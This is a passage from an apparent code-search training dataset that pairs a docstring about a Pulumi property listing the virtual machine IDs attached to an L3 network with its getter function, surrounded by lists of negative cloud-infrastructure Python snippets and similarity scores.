"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self):\n return self._device.type_name",
"def GetDiskType(self) -> str:\n disk = self.compute_client.disks.get(\n self.resource_group_name, self.name)\n disk_type = disk.sku.name # type: str\n return disk_type",
"def type(self) -> str:\n return self.type_",
"def resource_types(self) -> Sequence[str]:\n return pulumi.get(self, \"resource_types\")",
"def type(self) -> str:\n return self._type",
"def type(self) -> str:\n return self._type",
"def type(self) -> str:\n return self._type",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")"
] | [
"0.7918516",
"0.7918516",
"0.7866337",
"0.7866337",
"0.7866337",
"0.7866337",
"0.7866337",
"0.7708053",
"0.75534964",
"0.7282099",
"0.70591027",
"0.6979169",
"0.69202054",
"0.6868452",
"0.67303157",
"0.67049116",
"0.6654272",
"0.6646357",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.65510035",
"0.65426683",
"0.65426683",
"0.65426683",
"0.65426683",
"0.65426683",
"0.65426683",
"0.65426683",
"0.6487309",
"0.6455862",
"0.6447202",
"0.6447202",
"0.6430232",
"0.63791203",
"0.63791203",
"0.63791203",
"0.63791203",
"0.63791203",
"0.63791203",
"0.63791203",
"0.63719594",
"0.63487995",
"0.63141537",
"0.63127893",
"0.6305381",
"0.6305381",
"0.6305381",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216"
] | 0.0 | -1 |
Field Deprecated. These fields will be empty/omitted. The list of virtual machine resource IDs, excluding any Hybrid AKS virtual machines, that are currently using this L3 network. | def virtual_machines_associated_ids(self) -> pulumi.Output[Sequence[str]]:
return pulumi.get(self, "virtual_machines_associated_ids") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _GetMachineList(self):\n machines = self._experiment.remote\n # All Label.remote is a sublist of experiment.remote.\n for l in self._experiment.labels:\n for r in l.remote:\n assert r in machines\n return machines",
"def virtual_machines(self) -> Sequence['outputs.SubResourceReadOnlyResponse']:\n return pulumi.get(self, \"virtual_machines\")",
"def get_vm_list(self):\n\t\treturn Job(SDK.PrlSrv_GetVmList(self.handle)[0])",
"def security_ip_lists(self) -> pulumi.Output[Sequence[str]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def security_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def security_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def virtual_machine_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"virtual_machine_resource_id\")",
"def virtual_machines(self) -> Sequence['outputs.SubResourceWithColocationStatusResponse']:\n return pulumi.get(self, \"virtual_machines\")",
"def instance_list(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_list\")",
"def _UpdateMachineList(self, locked_machines):\n for m in self._experiment.remote:\n if m not in locked_machines:\n self._experiment.remote.remove(m)\n\n for l in self._experiment.labels:\n for m in l.remote:\n if m not in locked_machines:\n l.remote.remove(m)",
"def build_resource_labels(self):\n response = [ \n {\n \"key\": \"instance_id\", \n \"value\": \"9113659852587170607\"\n }, \n {\n \"key\": \"project_id\", \n \"value\": \"YOUR_PROJECT_ID\"\n }, \n {\n \"key\": \"zone\", \n \"value\": \"us-east4-a\"\n }\n ]\n return response",
"def virtual_networks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceIdArgs']]]]:\n return pulumi.get(self, \"virtual_networks\")",
"def machine_specs(self) -> Optional[Sequence['outputs.AiEndpointDeployedModelDedicatedResourceMachineSpec']]:\n return pulumi.get(self, \"machine_specs\")",
"def virtual_machines(self):\n return self._virtual_machines",
"def _instancelist(self):\n\n rv = []\n self.iname = {}\n for resv in self.conn.get_all_reservations():\n for inst in resv.instances:\n if inst.state != 'terminated':\n name = inst.tags.get('Name',None)\n rv.append([inst.id,inst.state])\n if name is not None:\n rv.append([name,inst.state])\n else:\n rv.append([inst.id+'-needsName',inst.state])\n self.iname[name] = inst.id\n self.iname[inst.id] = inst.id\n return rv",
"def virtual_networks(self) -> pulumi.Output[Optional[Sequence['outputs.ResourceIdResponse']]]:\n return pulumi.get(self, \"virtual_networks\")",
"def get_virtual_network_list(self, nFlags = 0):\n\t\treturn Job(SDK.PrlSrv_GetVirtualNetworkList(self.handle, nFlags)[0])",
"def list(self):\n\n s = self.cloudman.list_servers()\n\n servers = self.get_list(self.cloudman.list_servers(), kind=\"vm\")\n\n result = []\n for server in servers:\n\n if 'cm' in server['metadata']:\n metadata = server['metadata']['cm']\n cm = literal_eval(metadata)\n if 'cm' in server:\n server['cm'].update(cm)\n try:\n server['ip_public'] = self.get_public_ip(server=server)\n except:\n pass\n try:\n server['ip_private'] = self.get_private_ip(server=server)\n except:\n pass\n result.append(server)\n\n return result",
"def list_instances(self):\n instances = []\n try:\n pages = self.compute.virtual_machines.list(\n CONF.azure.resource_group)\n except Exception as e:\n msg = six.text_type(e)\n LOG.exception(msg)\n ex = exception.InstanceListFailure(reason=six.text_type(e))\n raise ex\n else:\n if pages:\n for i in pages:\n instances.append(i.name)\n return instances",
"def list_virtual_networks(client, private_cloud, resource_pool, location):\n return client.list(location, private_cloud, resource_pool)",
"def ip_whitelists(self) -> pulumi.Output[Sequence['outputs.InstanceIpWhitelist']]:\n return pulumi.get(self, \"ip_whitelists\")",
"def resources(self) -> pulumi.Output[Sequence['outputs.MachineExtensionResponse']]:\n return pulumi.get(self, \"resources\")",
"def list_pilot_compute(self):\n return self.pilot_job_service",
"def view_list_machines(self, user):\r\n return [machine.IP for machine in user.realm._balancer._machines]",
"def service_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"service_ip_lists\")",
"def service_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"service_ip_lists\")",
"def azurerm_virtual_machine(LOGGER, VM, TERRAFORM_NETWORK_INTERFACES,\n TERRAFORM_PUBLIC_IPS, TERRAFORM_SECURITY_GROUPS,\n TERRAFORM_INVENTORY):\n LOGGER.info('Adding %s: %s to inventory.' %\n (VM['data_type'], VM['inventory_hostname']))\n\n for interface in TERRAFORM_NETWORK_INTERFACES:\n if interface['virtual_machine_id'] == VM['id']:\n PUB_IPS = []\n VM_INFO = dict()\n LOGGER.debug(interface)\n for pub_ip in TERRAFORM_PUBLIC_IPS:\n if (pub_ip['id'] in interface['public_ips'] and\n pub_ip['ip_address'] not in PUB_IPS):\n PUB_IPS.append(pub_ip['ip_address'])\n\n VM_INFO.update(\n {\n 'inventory_hostname': VM['inventory_hostname'],\n 'data_type': VM['data_type'],\n 'ansible_host': interface['private_ip_address'],\n 'location': VM['location'],\n 'mac_address': interface['mac_address'],\n 'private_ips': interface['private_ips'],\n 'public_ips': PUB_IPS,\n 'resource_group_name': VM['resource_group_name'],\n 'target': VM['target'],\n 'vm_size': VM['vm_size'],\n 'ansible_groups': VM['ansible_groups']\n }\n )\n\n for security_group in TERRAFORM_SECURITY_GROUPS:\n try:\n interface['network_security_group_id']\n if (interface['network_security_group_id'] ==\n security_group['id']):\n VM_INFO.update(\n {\n 'security_groups':\n security_group['security_groups'],\n }\n )\n except KeyError:\n LOGGER.debug(KeyError)\n pass\n\n return VM_INFO",
"def gateway_cluster_id_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"gateway_cluster_id_lists\")",
"def vulnerabilities_allowed_list(self):\n if 'VULNERABILITIES_ALLOWED_LIST' in os.environ:\n return os.environ[\n 'VULNERABILITIES_ALLOWED_LIST'\n ].split(',')\n else:\n return []",
"def list_resource_pool(client, private_cloud, location):\n return client.list(location, private_cloud)",
"def list_vm(client, resource_group_name=None):\n if resource_group_name is None:\n return client.list_by_subscription()\n return client.list_by_resource_group(resource_group_name)",
"def allocation_resource_tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"allocation_resource_tags\")",
"def allocation_resource_tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"allocation_resource_tags\")",
"def slave_ips(self) -> 'List[str]':\n raise NotImplementedError",
"def get_elb_instance_ids(elbclient, elbname):\r\n try:\r\n resp = elbclient.describe_load_balancers(LoadBalancerNames=[elbname])\r\n except:\r\n print(ex.message)\r\n return None\r\n return list(map(\r\n lambda x:x['InstanceId'],\r\n resp['LoadBalancerDescriptions'][0]['Instances']\r\n ))",
"def to_deprecated_list_repr(self):\r\n return ['c4x', self.org, self.course, self.block_type, self.name, None]",
"def ExternalSystemIdentifiers(self, default=[{}]):\n tmp = self.data.get('metadata', {}).get('external_system_identifiers', default)\n return [HEP.IDObject(i) for i in tmp]",
"def __init__(__self__, *,\n resource_group_name: pulumi.Input[str],\n agent_upgrade: Optional[pulumi.Input['AgentUpgradeArgs']] = None,\n client_public_key: Optional[pulumi.Input[str]] = None,\n extensions: Optional[pulumi.Input[Sequence[pulumi.Input['MachineExtensionInstanceViewArgs']]]] = None,\n identity: Optional[pulumi.Input['IdentityArgs']] = None,\n location: Optional[pulumi.Input[str]] = None,\n location_data: Optional[pulumi.Input['LocationDataArgs']] = None,\n machine_name: Optional[pulumi.Input[str]] = None,\n mssql_discovered: Optional[pulumi.Input[str]] = None,\n os_profile: Optional[pulumi.Input['OSProfileArgs']] = None,\n os_type: Optional[pulumi.Input[str]] = None,\n parent_cluster_resource_id: Optional[pulumi.Input[str]] = None,\n private_link_scope_resource_id: Optional[pulumi.Input[str]] = None,\n service_statuses: Optional[pulumi.Input['ServiceStatusesArgs']] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vm_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if agent_upgrade is not None:\n pulumi.set(__self__, \"agent_upgrade\", agent_upgrade)\n if client_public_key is not None:\n pulumi.set(__self__, \"client_public_key\", client_public_key)\n if extensions is not None:\n pulumi.set(__self__, \"extensions\", extensions)\n if identity is not None:\n pulumi.set(__self__, \"identity\", identity)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if location_data is not None:\n pulumi.set(__self__, \"location_data\", location_data)\n if machine_name is not None:\n pulumi.set(__self__, \"machine_name\", machine_name)\n if mssql_discovered is not None:\n pulumi.set(__self__, \"mssql_discovered\", mssql_discovered)\n if os_profile is not None:\n pulumi.set(__self__, \"os_profile\", os_profile)\n if os_type is not None:\n pulumi.set(__self__, \"os_type\", os_type)\n if parent_cluster_resource_id is not None:\n pulumi.set(__self__, \"parent_cluster_resource_id\", parent_cluster_resource_id)\n if private_link_scope_resource_id is not None:\n pulumi.set(__self__, \"private_link_scope_resource_id\", private_link_scope_resource_id)\n if service_statuses is not None:\n pulumi.set(__self__, \"service_statuses\", service_statuses)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if vm_id is not None:\n pulumi.set(__self__, \"vm_id\", vm_id)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n agent_upgrade: Optional[pulumi.Input[pulumi.InputType['AgentUpgradeArgs']]] = None,\n client_public_key: Optional[pulumi.Input[str]] = None,\n extensions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MachineExtensionInstanceViewArgs']]]]] = None,\n identity: Optional[pulumi.Input[pulumi.InputType['IdentityArgs']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n location_data: Optional[pulumi.Input[pulumi.InputType['LocationDataArgs']]] = None,\n machine_name: Optional[pulumi.Input[str]] = None,\n mssql_discovered: Optional[pulumi.Input[str]] = None,\n os_profile: Optional[pulumi.Input[pulumi.InputType['OSProfileArgs']]] = None,\n os_type: Optional[pulumi.Input[str]] = None,\n parent_cluster_resource_id: Optional[pulumi.Input[str]] = None,\n private_link_scope_resource_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n service_statuses: Optional[pulumi.Input[pulumi.InputType['ServiceStatusesArgs']]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vm_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def resource_labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"resource_labels\")",
"def ExternalSystemIdentifiers(self, default=[{}]):\n tmp = self.data.get('external_system_identifiers', default)\n return [HEP.IDObject(i) for i in tmp]",
"def list_instances(self):\n nodes = self._driver.list_nodes()\n return [[n.name, n.state, n.public_ips] for n in nodes]",
"def machines(self) -> Iterable[dto.Machine]:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )",
"def allocation_resource_tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:\n return pulumi.get(self, \"allocation_resource_tags\")",
"def __init__(self, id=None, description=None, provisioning_status=None, admin_state_up=None, provider=None, pools=None, listeners=None, operating_status=None, vip_address=None, vip_subnet_cidr_id=None, name=None, project_id=None, vip_port_id=None, tags=None, created_at=None, updated_at=None, guaranteed=None, vpc_id=None, eips=None, ipv6_vip_address=None, ipv6_vip_virsubnet_id=None, ipv6_vip_port_id=None, availability_zone_list=None, enterprise_project_id=None, l4_flavor_id=None, l4_scale_flavor_id=None, l7_flavor_id=None, l7_scale_flavor_id=None, publicips=None, elb_virsubnet_ids=None, elb_virsubnet_type=None, ip_target_enable=None, deletion_protection_enable=None, frozen_scene=None, ipv6_bandwidth=None):\n \n \n\n self._id = None\n self._description = None\n self._provisioning_status = None\n self._admin_state_up = None\n self._provider = None\n self._pools = None\n self._listeners = None\n self._operating_status = None\n self._vip_address = None\n self._vip_subnet_cidr_id = None\n self._name = None\n self._project_id = None\n self._vip_port_id = None\n self._tags = None\n self._created_at = None\n self._updated_at = None\n self._guaranteed = None\n self._vpc_id = None\n self._eips = None\n self._ipv6_vip_address = None\n self._ipv6_vip_virsubnet_id = None\n self._ipv6_vip_port_id = None\n self._availability_zone_list = None\n self._enterprise_project_id = None\n self._l4_flavor_id = None\n self._l4_scale_flavor_id = None\n self._l7_flavor_id = None\n self._l7_scale_flavor_id = None\n self._publicips = None\n self._elb_virsubnet_ids = None\n self._elb_virsubnet_type = None\n self._ip_target_enable = None\n self._deletion_protection_enable = None\n self._frozen_scene = None\n self._ipv6_bandwidth = None\n self.discriminator = None\n\n self.id = id\n self.description = description\n self.provisioning_status = provisioning_status\n self.admin_state_up = admin_state_up\n self.provider = provider\n self.pools = pools\n self.listeners = listeners\n self.operating_status = operating_status\n self.vip_address = vip_address\n self.vip_subnet_cidr_id = vip_subnet_cidr_id\n self.name = name\n self.project_id = project_id\n self.vip_port_id = vip_port_id\n self.tags = tags\n self.created_at = created_at\n self.updated_at = updated_at\n self.guaranteed = guaranteed\n self.vpc_id = vpc_id\n self.eips = eips\n self.ipv6_vip_address = ipv6_vip_address\n self.ipv6_vip_virsubnet_id = ipv6_vip_virsubnet_id\n self.ipv6_vip_port_id = ipv6_vip_port_id\n self.availability_zone_list = availability_zone_list\n if enterprise_project_id is not None:\n self.enterprise_project_id = enterprise_project_id\n self.l4_flavor_id = l4_flavor_id\n self.l4_scale_flavor_id = l4_scale_flavor_id\n self.l7_flavor_id = l7_flavor_id\n self.l7_scale_flavor_id = l7_scale_flavor_id\n if publicips is not None:\n self.publicips = publicips\n if elb_virsubnet_ids is not None:\n self.elb_virsubnet_ids = elb_virsubnet_ids\n if elb_virsubnet_type is not None:\n self.elb_virsubnet_type = elb_virsubnet_type\n if ip_target_enable is not None:\n self.ip_target_enable = ip_target_enable\n if deletion_protection_enable is not None:\n self.deletion_protection_enable = deletion_protection_enable\n self.frozen_scene = frozen_scene\n if ipv6_bandwidth is not None:\n self.ipv6_bandwidth = ipv6_bandwidth",
"def associated_resource_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"associated_resource_ids\")",
"def associated_resource_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"associated_resource_ids\")",
"def test_list_virt_realms_in_cloud(self):\n pass",
"def ip_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceIpWhitelistArgs']]]]:\n return pulumi.get(self, \"ip_whitelists\")",
"def ip_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceIpWhitelistArgs']]]]:\n return pulumi.get(self, \"ip_whitelists\")",
"def ListResourceTags(self, ResourceId):\n\n Client = boto3.client('kms')\n \n response = Client.list_resource_tags (\n KeyId = ResourceId\n\t)\n\n return response",
"def get_all_virtual_machines(app_id=None):\n url = ''\n if app_id is not None:\n url += 'appliance_id=%s' % str(app_id)\n if len(url) > 0:\n url = '?' + url\n return atmosphere.tools.create_req(url=url)",
"def list_vm_template(client, private_cloud, resource_pool, location):\n return client.list(private_cloud, location, resource_pool)",
"def service_ip_lists(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"service_ip_lists\")",
"def get_instance_list():\n return parse_list_output(Popen('nova list --all-tenants'.split(),\n stdout=STDOUT, stderr=STDERR).communicate()[0])",
"def _validate_resources(self):\n resources = self.options.resources\n\n for key in ['num_machines', 'num_mpiprocs_per_machine', 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: '\n 'parallelization is not supported, only a value of `1` is accepted.'\n )",
"def vios_uuids(self):\n raise NotImplementedError()",
"def list_instances(self, label_filters: Optional[dict] = None) -> List[\"GCPNode\"]:\n return",
"def tags(self):\n return ['HostRoles/component_name', \\\n 'HostRoles/host_name', \\\n 'HostRoles/cluster_name']",
"def test_get_virtualization_realms(self):\n pass",
"def get_all_vulnerable_vm_id(self, vm_id: str) -> List[str]:\n if not self._validated:\n raise VmAttackServiceSetUpException('First you should call \"set_cloud_environment\" successfully')\n\n # Find this vm index\n attacker_vm_index = self._get_vm_index(vm_id)\n\n # Go through the graph\n indexes = self._get_all_accessible_vertex_from_index(attacker_vm_index)\n\n # Return only vm ids\n return [self._vms[index]['vm_id'] for index in indexes]",
"def metric_labels_allowlist(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"metric_labels_allowlist\")",
"def list_vnics(client, resource_group_name, vm_name):\n virtual_machine = client.get(resource_group_name, vm_name)\n return virtual_machine.nics",
"def get_vehicle_variables_list(self):\n return self.get('vehicles/GetVehicleVariableList')",
"def vmss(resource: dict) -> dict:\n cleanse = [\n \"properties\", \"instances\"\n ]\n\n return __cleanse(cleanse, resource)",
"def source_instance_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"source_instance_ids\")",
"def source_instance_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"source_instance_ids\")",
"def microvm(self):\n return self._context.get(\"microvm\", None)",
"def resource_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"resource_labels\")",
"def resource_names(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resource_names\")",
"def resource_names(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"resource_names\")",
"def valve_name_list(self):\n return list(self._link_reg.valve_names)",
"def list_nodes(self):\n nodes = self.nodes\n result = []\n for i_node in self.iapi.node.list():\n if i_node.name:\n name = i_node.name\n else:\n # Sometimes Ironic does not show the names, pull them from Nova if possible.\n selected_nova_node = None\n for nova_node in nodes:\n if getattr(\n nova_node, 'OS-EXT-SRV-ATTR:hypervisor_hostname', None) == i_node.uuid:\n selected_nova_node = nova_node\n break\n if selected_nova_node:\n name = selected_nova_node.name\n else:\n name = None\n result.append(Node(i_node.uuid, name, i_node.power_state, i_node.provision_state))\n return result",
"def list_instances(self):\n LOG.debug(\"list_instances\")\n\n instance_ids = []\n bmms = db.bmm_get_all(None)\n for bmm in bmms:\n if not bmm[\"instance_id\"]:\n continue\n instance_ids.append(self._instance_id_to_name(bmm[\"instance_id\"]))\n\n return instance_ids",
"def cpu_ids() -> List[int]:\n api_file = open('/sys/devices/system/cpu/present', 'r')\n\n cpu_id_tmp = re.findall('\\d+|-', api_file.readline().strip())\n cpu_id_list = []\n for i in range(len(cpu_id_tmp)):\n if cpu_id_tmp[i] == '-':\n for cpu_id in range(int(cpu_id_tmp[i - 1]) + 1, int(cpu_id_tmp[i + 1])):\n cpu_id_list.append(int(cpu_id))\n else:\n cpu_id_list.append(int(cpu_id_tmp[i]))\n return cpu_id_list",
"def test_get_hyperflex_feature_limit_external_list(self):\n pass",
"def _minimal_vlist(self):\n vlist = list()\n if self.dataset_id == \"phy\" or self.dataset_id == \"bgc\":\n plist = [\n \"data_mode\",\n \"latitude\",\n \"longitude\",\n \"position_qc\",\n \"time\",\n \"time_qc\",\n \"direction\",\n \"platform_number\",\n \"cycle_number\",\n \"config_mission_number\",\n \"vertical_sampling_scheme\",\n ]\n [vlist.append(p) for p in plist]\n\n plist = [\"pres\", \"temp\", \"psal\"]\n if self.dataset_id == \"bgc\":\n plist = [\"pres\", \"temp\", \"psal\", \"doxy\"]\n [vlist.append(p) for p in plist]\n [vlist.append(p + \"_qc\") for p in plist]\n [vlist.append(p + \"_adjusted\") for p in plist]\n [vlist.append(p + \"_adjusted_qc\") for p in plist]\n [vlist.append(p + \"_adjusted_error\") for p in plist]\n\n elif self.dataset_id == \"ref\":\n plist = [\"latitude\", \"longitude\", \"time\", \"platform_number\", \"cycle_number\"]\n [vlist.append(p) for p in plist]\n plist = [\"pres\", \"temp\", \"psal\", \"ptmp\"]\n [vlist.append(p) for p in plist]\n\n return vlist",
"def list_local_devices():\n def _convert(pb_str):\n m = device_attributes_pb2.DeviceAttributes()\n m.ParseFromString(pb_str)\n return m\n return [_convert(s) for s in pywrap_tensorflow.DeviceFactory_AddDevices()]",
"def monitor_nodes(self) -> List[str]:\n return self._monitor_nodes.copy()",
"def inverter_list(self, plant_id):\n warnings.warn(\"This function may be deprecated in the future because naming is not correct, use device_list instead\", DeprecationWarning)\n return self.device_list(plant_id)",
"def tunables(self):\n return base_64_to_object(self.tunable_hyperparameters_64)",
"def vulnerability_ids():\n\n if S3VulnerabilityModel.indicator_pids is None:\n db = current.db\n table = db.vulnerability_indicator\n rows = db(table.deleted == False).select(table.parameter_id)\n S3VulnerabilityModel.indicator_pids = [i.parameter_id for i in rows]\n\n return S3VulnerabilityModel.indicator_pids",
"def ListTags(self, ResourceId):\n \n Client = boto3.client(self.Service) \n\n if self.Service == 's3':\n response = Client.list_tags (\n Bucket = ResourceId\n\t )\n elif self.Service == 'es':\n response = Client.list_tags (\n ARN = ResourceId\n\t )\n elif self.Service == 'cloudtrail':\n response = Client.list_tags (\n ResourceIdList = [\n ResourceId\n\t\t]\n\t )\n elif self.Service == 'sagemaker':\n response = Client.list_tags (\n ResourceArn = ResourceId\n\t )\n elif self.Service == 'dax':\n response = Client.list_tags (\n ResourceName = ResourceId\n\t )\n elif self.Service == 'lambda':\n response = Client.list_tags (\n Resource = ResourceId\n\t )\n else:\n raise TagNotSupportedError(self.Service)\n \n return response",
"def list(self, filters: dict = None, state: str = None, exclude: str = None) -> list:\n date_format = '%Y-%m-%d %H:%M:%S'\n self.instances = self.ec2.instances.all()\n\n # TOREMOVE\n def __all_instances():\n # all instances without filtering\n self.instances = [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in self.instances\n ]\n\n if state:\n try:\n self.instances = self.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': [state]}])\n except IOError as e:\n raise EC2Error('Error listing instances by state {0} {1}'.format(state, e))\n\n if filters:\n # convert string into dict\n filters = literal_eval(filters)\n try:\n if not self.instances:\n self.instances = self.ec2.instances.all()\n\n self.instances = self.instances.filter(Filters=[{'Name': filters['Name'], 'Values': filters['Values']}])\n except IOError as e:\n raise EC2Error('Error listing instances with filters {0} {1}'.format(filters, e))\n\n if exclude:\n instances = []\n for i in self.instances:\n if i.id not in exclude:\n instances.append(i)\n return [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in instances\n ]\n else:\n return [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in self.instances\n ]",
"def get_instances() -> dict:\n url = f\"{app.config['COMPUTE_SERVERS_REF']}/detail\"\n instances_rq = request(\n method=\"GET\", url=url, headers=build_header(), params={\"vm_state\": \"active\"},\n )\n\n if not instances_rq.ok:\n HTTPError(instances_rq.status_code)\n\n answer = {\"servers\": list()}\n for instance in instances_rq.json()[\"servers\"]:\n instance_info = dict(name=instance[\"name\"])\n instance_info[\"ip_addresses\"] = list()\n for network, info in instance[\"addresses\"].items():\n instance_info[\"ip_addresses\"].extend(entry[\"addr\"] for entry in info)\n answer[\"servers\"].append(instance_info)\n\n return answer",
"def cloud_ids(self):\n if self.stage == 'trainval':\n ids = self.all_cloud_ids['train'] + self.all_cloud_ids['val']\n else:\n ids = self.all_cloud_ids[self.stage]\n return sorted(list(set(ids)))",
"def test_get_hyperflex_feature_limit_internal_list(self):\n pass",
"def machine_lookup_all(session, hostname, public_ip = True):\n client = session.client('ec2')\n response = client.describe_instances(Filters=[{\"Name\":\"tag:Name\", \"Values\":[hostname]},\n {\"Name\":\"instance-state-name\", \"Values\":[\"running\"]}])\n\n addresses = []\n items = response['Reservations']\n if len(items) > 0:\n for i in items:\n item = i['Instances'][0]\n if 'PublicIpAddress' in item and public_ip:\n addresses.append(item['PublicIpAddress'])\n elif 'PrivateIpAddress' in item and not public_ip:\n addresses.append(item['PrivateIpAddress'])\n return addresses",
"def list_instances(self):\n instances = utils.list_instances(self.compute_client,\n drv_conf.resource_group)\n\n self._uuid_to_omni_instance.clear()\n instance_names = []\n for instance in instances:\n openstack_id = None\n if instance.tags and 'openstack_id' in instance.tags:\n openstack_id = instance.tags['openstack_id']\n if openstack_id is None:\n openstack_id = self._get_uuid_from_omni_id(instance.name)\n self._uuid_to_omni_instance[openstack_id] = instance\n instance_names.append(instance.name)\n return instance_names",
"def lv_devices(self):\n devs = set()\n return devs",
